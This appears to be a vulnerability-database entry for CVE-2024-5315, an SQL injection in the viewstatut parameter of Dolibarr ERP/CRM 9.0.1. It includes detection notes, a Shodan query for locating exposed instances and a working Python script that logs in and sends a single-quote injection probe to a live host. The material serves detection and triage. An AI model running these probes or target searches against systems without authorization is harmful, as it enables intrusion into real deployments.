CVE-2024-5315
published 2024-05-24


Priority: P278
Severity: critical, 9.1 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:N
Exploit: yes (Nuclei template available; see Detection & IOCs)
EPSS: 32.87% (98.1th percentile)
Dolibarr ERP/CRM version 9.0.1 is vulnerable to SQL injection. A remote attacker can send a specially crafted SQL query to the system through the viewstatut parameter of /dolibarr/commande/list.php and retrieve all the information stored in the database.

Affected (3 ranges)

Vendor | Product | Version range | Fixed in
dolibarr | dolibarr | 0 – 9.0.1 |
dolibarr | dolibarr_erp_crm | |
dolibarr | erp_cms | |

Detection & IOCs (extracted from sources)

path: /dolibarr/commande/list.php
path: /htdocs/commande/list.php
url: /htdocs/commande/list.php?viewstatut=x%27
(The `/dolibarr/` and `/htdocs/` prefixes reflect different deployment roots; the vulnerable script is `commande/list.php` under either.)
  • SQL injection is triggered via the `viewstatut` GET parameter of `/htdocs/commande/list.php`. A single-quote payload (`x'`, sent as `x%27`) causes a MySQL syntax error that is visible in the response body.
  • Exploitation requires valid credentials (authenticated attack); the Nuclei template takes them as the `{{username}}` and `{{password}}` variables, supplied at runtime. Detect a successful login by checking for a `Set-Cookie: DOLSESSID_...` header in the response to the login POST.
  • A vulnerable response to the injection probe contains the string 'You have an error in your SQL syntax' in the body.
  • The Dolibarr authentication endpoint is `/htdocs/index.php?mainmenu=home`, called via POST with the parameters `loginfunction`, `username`, and `password`. A successful admin login returns a body containing 'SuperAdmin'.
  • Shodan query to identify exposed Dolibarr instances: `http.title:"Dolibarr"`
  • The vulnerability specifically affects Dolibarr ERP/CRM version 9.0.1. Confirm the target version before testing.
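The two-step check described in the notes above (authenticate, then probe `viewstatut`), written out as an added example. This is not the Nuclei template and not Dolibarr code: the `/htdocs` prefix, the `loginfunction=loginfunction` form value, the constructed sample responses and the stdlib-only live-run wrapper are assumptions made for this example; the endpoint, parameter names, cookie prefix and error string come from the notes.

```python
"""Authenticated SQL-injection check for CVE-2024-5315 (viewstatut, commande/list.php).

Added example, not the Nuclei template or any Dolibarr code. It follows the
detection notes: POST the login form, confirm a DOLSESSID_* session cookie was
issued ('SuperAdmin' in the body marks an admin login), then request
viewstatut=x' and look for the MySQL syntax-error text. The URL prefix, the
loginfunction value, the sample responses and run_live() are assumptions.
"""
import http.cookiejar
import sys
import urllib.error
import urllib.parse
import urllib.request

LOGIN_PATH = "/htdocs/index.php?mainmenu=home"      # from the detection notes
PROBE_PATH = "/htdocs/commande/list.php"            # vulnerable script
PAYLOAD = "x'"                                      # single quote breaks the query
SQL_ERROR = "You have an error in your SQL syntax"  # MySQL/MariaDB error string
COOKIE_PREFIX = "DOLSESSID_"                        # Dolibarr session cookie name


def build_login_body(username: str, password: str) -> bytes:
    """Form body for the login POST; the value 'loginfunction' is an assumption."""
    fields = {"loginfunction": "loginfunction", "username": username, "password": password}
    return urllib.parse.urlencode(fields).encode()


def build_probe_url(base_url: str, payload: str = PAYLOAD) -> str:
    """Probe URL; urlencode turns x' into x%27, matching the IOC URL above."""
    query = urllib.parse.urlencode({"viewstatut": payload})
    return f"{base_url.rstrip('/')}{PROBE_PATH}?{query}"


def has_session_cookie(set_cookie_values) -> bool:
    """True if any Set-Cookie value (or name=value pair) names a DOLSESSID_* cookie."""
    return any(v.lstrip().startswith(COOKIE_PREFIX) for v in set_cookie_values)


def login_is_admin(login_body: str) -> bool:
    """The notes say a successful admin login page contains 'SuperAdmin'."""
    return "SuperAdmin" in login_body


def sqli_error_present(probe_body: str) -> bool:
    return SQL_ERROR in probe_body


def classify(set_cookie_values, probe_body: str) -> str:
    """Verdict from the two responses; without a session the probe proves nothing."""
    if not has_session_cookie(set_cookie_values):
        return "login-failed"
    return "vulnerable" if sqli_error_present(probe_body) else "no-error-observed"


# Constructed sample responses (not captured from a real host).
SAMPLE_SET_COOKIE = ["DOLSESSID_3f1a9c=7d2e4b9a1c; path=/; HttpOnly"]
SAMPLE_PROBE_BODY = (
    '<div class="error">Error: You have an error in your SQL syntax; '
    "check the manual that corresponds to your MySQL server version for the "
    "right syntax to use near 'x''' at line 1</div>"
)


def run_live(base_url: str, username: str, password: str) -> str:
    """Run both requests against a real host (assumed wrapper; use only with authorization)."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    login = opener.open(base_url.rstrip("/") + LOGIN_PATH,
                        data=build_login_body(username, password), timeout=15)
    login_body = login.read().decode("utf-8", errors="replace")
    # Redirects can hide the raw Set-Cookie header, so read the jar instead.
    cookies = [f"{c.name}={c.value}" for c in jar]
    try:
        probe = opener.open(build_probe_url(base_url), timeout=15)
    except urllib.error.HTTPError as err:   # a 500 still carries the page body
        probe = err
    verdict = classify(cookies, probe.read().decode("utf-8", errors="replace"))
    if login_is_admin(login_body):
        verdict += " (admin session)"
    return verdict


if __name__ == "__main__":
    if len(sys.argv) == 4:
        print(run_live(sys.argv[1], sys.argv[2], sys.argv[3]))
    else:  # offline demonstration on the constructed samples
        print(build_probe_url("https://erp.example.test"))
        print(classify(SAMPLE_SET_COOKIE, SAMPLE_PROBE_BODY))
```

Run it as `python3 check.py https://host user pass` for a live check, or with no arguments to exercise the verdict logic on the constructed samples. The verdict deliberately distinguishes a failed login from a clean probe: a response without the error string only means something when the session cookie was actually issued.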

CVSS provenance

Source | Version | Score | Severity | Vector
nvd | v3.1 | 9.1 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
osv | | 9.1 | CRITICAL |

Note that the NVD vector rates the issue PR:N (no privileges required), while the detection notes above describe a probe that only works after a valid login. When prioritizing, treat this as an authenticated attack unless you have evidence the parameter is reachable pre-auth in your deployment.